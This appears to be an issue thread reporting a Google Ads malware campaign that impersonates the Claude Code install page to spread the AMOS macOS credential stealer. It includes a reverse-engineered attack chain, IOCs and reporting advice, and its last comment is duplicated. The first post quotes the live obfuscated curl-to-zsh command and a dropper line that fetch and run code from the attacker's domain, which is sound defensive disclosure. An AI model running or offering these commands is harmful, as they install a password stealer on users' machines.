Malware campaign impersonating Claude Code install via Google Ads

[aadaam]

Summary

A malware campaign is actively targeting users searching for "claude code install" via Google Ads. The sponsored result leads to a fake install page that distributes a macOS credential stealer.

Distribution

Fake install page (Google Ads sponsored result):
https://claudecodeupdate.squarespace.com/

This page appeared as a top result for the query "claude code install" and instructs users to run an obfuscated curl command in their terminal.

Obfuscated install command served by the page:

curl -ksfLS $(echo 'aHR0cHM6Ly93b3VwcC5jb20vY3VybC81YmQxYzJhZGIzMjAyOGVjM2FkNmY1N2UxYzJjMDg4MGQ1MmI3OWMyZmI4ZDUwNDc0OTBkZjJjOGMxZTFmOThj'|base64 -D) | zsh

The base64 decodes to: https://woupp.com/curl/5bd1c2adb32028ec3ad6f57e1c2c0880d52b79c2fb8d5047490df2c8c1e1f98c

Attack Chain (fully reverse-engineered)

Stage 1: Dropper script

The curl downloads a small zsh script containing a gzipped+base64 payload that decodes to:

curl -o /tmp/helper https://woupp.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper

Stage 2: Native binary (/tmp/helper)

• Type: Mach-O universal binary (x86_64 + arm64), unsigned
• Size: 15,891,320 bytes
• SHA-256: 853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa
• Linked libs: only libSystem.B.dylib + libc++.1.dylib
• Obfuscation: All strings/scripts XOR-encrypted in a 6.7 MB __const section; decrypted at runtime
• Execution method: fork() → pipe() + dup2() → execl("/bin/bash", "/bin/bash", "-s", NULL) → feeds decrypted commands via write()

Stage 3: Credential stealing (via osascript/AppleScript)

The decrypted payload executes two osascript processes that:

1. Request TCC AppleEvents permission for Terminal
2. Browse /Applications/ via Finder (fndr,gstl) for reconnaissance
3. Hide the Terminal window (core,setd → Terminal)
4. Gather system info via multiple do shell script calls
5. Write a machine fingerprint hash to ~/.username
6. Display a fake password dialog (syso,dlog) to social-engineer the user's macOS password
7. Write the captured password to ~/.pass
8. Create temporary staging files, read system data
9. Exfiltrate collected data via curl back to woupp.com
10. Clean up temporary files

Indicators of Compromise (IOCs)

Type	Value
Distribution URL	https://claudecodeupdate.squarespace.com/
C2 Domain	woupp.com
C2 IPs (Cloudflare)	188.114.97.3, 188.114.96.3
C2 IPv6	2a06:98c1:3120::3, 2a06:98c1:3121::3
Dropper URL	https://woupp.com/curl/5bd1c2adb32028ec3ad6f57e1c2c0880d52b79c2fb8d5047490df2c8c1e1f98c
Binary URL	https://woupp.com/n8n/update
Binary SHA-256	853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa
SSL Cert	Let's Encrypt E8, issued 2026-03-09, CN=woupp.com
Dropped files	~/.username, ~/.pass
TCC modification	kTCCServiceAppleEvents granted to com.apple.Terminal

Recommendations

1. Report claudecodeupdate.squarespace.com to Google Ads for malware distribution via sponsored results
2. Report woupp.com to Cloudflare (abuse@cloudflare.com) — domain is behind Cloudflare proxy
3. Consider adding a security notice to the official Claude Code install documentation warning about fake install pages
4. The official install method should be clearly documented and easily distinguishable from social engineering attempts

[aadaam]

VirusTotal Results

The binary has been uploaded to VirusTotal and is now detected by multiple engines:

Engine	Detection
Avast	MacOS:Stealer-HH [Pws]
AVG	MacOS:Stealer-HH [Pws]
Cynet	Malicious (score: 99)
Elastic	Malicious (high Confidence)
ESET-NOD32	OSX/PSW.Agent.GY Trojan
Kaspersky	HEUR:Trojan-PSW.OSX.Amos.bn

This is AMOS (Atomic macOS Stealer) — a commercial malware-as-a-service info-stealer specifically targeting macOS users. It is actively being distributed via Google Ads targeting "claude code install" search queries.

VirusTotal link: https://www.virustotal.com/gui/file/853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa

[itallstartedwithaidea]

Confirming this is a real and active threat. As someone who manages enterprise Google Ads campaigns professionally, here's context on how this works and what can be done:

How the attacker is doing it:

• They're running Google Search ads targeting keywords like "claude code install", "claude code download", "anthropic claude code"
• Google's ad system shows these as "Sponsored" results above organic — most users don't distinguish between sponsored and organic
• The advertiser passed Google's identity verification (listed as verified in the US), which gives the ad more credibility
• The landing page mimics Anthropic's branding and serves a macOS credential stealer

Why Google's systems aren't catching it:

• Google reviews ads and landing pages at submission time, but sophisticated actors swap the landing page content after approval (cloaking)
• The advertiser verification system checks identity, not intent — a verified advertiser can still serve malware
• Google's automated review systems are better at catching policy violations in ad text than in landing page behavior

What Anthropic can do:

1. File a Google Ads trademark complaint at ads.google.com/trademarkcomplaint — this prevents unauthorized advertisers from using "Claude" and "Anthropic" in ad text
2. Run your own brand campaigns on "claude code install" and "claude code download" — this pushes malicious ads down and costs the attacker more per click
3. Report the specific advertiser through Google Ads Transparency Center using the advertiser name from the ad's "About this ad" disclosure

The trademark complaint is the highest-leverage action — it's free and can be processed within a few business days.

[itallstartedwithaidea]

Confirming this is a real and active threat. As someone who manages enterprise Google Ads campaigns professionally, here's context on how this works and what can be done:

How the attacker is doing it:

• They're running Google Search ads targeting keywords like "claude code install", "claude code download", "anthropic claude code"
• Google's ad system shows these as "Sponsored" results above organic — most users don't distinguish between sponsored and organic
• The advertiser passed Google's identity verification (listed as verified in the US), which gives the ad more credibility
• The landing page mimics Anthropic's branding and serves a macOS credential stealer

Why Google's systems aren't catching it:

• Google reviews ads and landing pages at submission time, but sophisticated actors swap the landing page content after approval (cloaking)
• The advertiser verification system checks identity, not intent — a verified advertiser can still serve malware
• Google's automated review systems are better at catching policy violations in ad text than in landing page behavior

What Anthropic can do:

1. File a Google Ads trademark complaint at ads.google.com/trademarkcomplaint — this prevents unauthorized advertisers from using "Claude" and "Anthropic" in ad text
2. Run your own brand campaigns on "claude code install" and "claude code download" — this pushes malicious ads down and costs the attacker more per click
3. Report the specific advertiser through Google Ads Transparency Center using the advertiser name from the ad's "About this ad" disclosure

The trademark complaint is the highest-leverage action — it's free and can be processed within a few business days.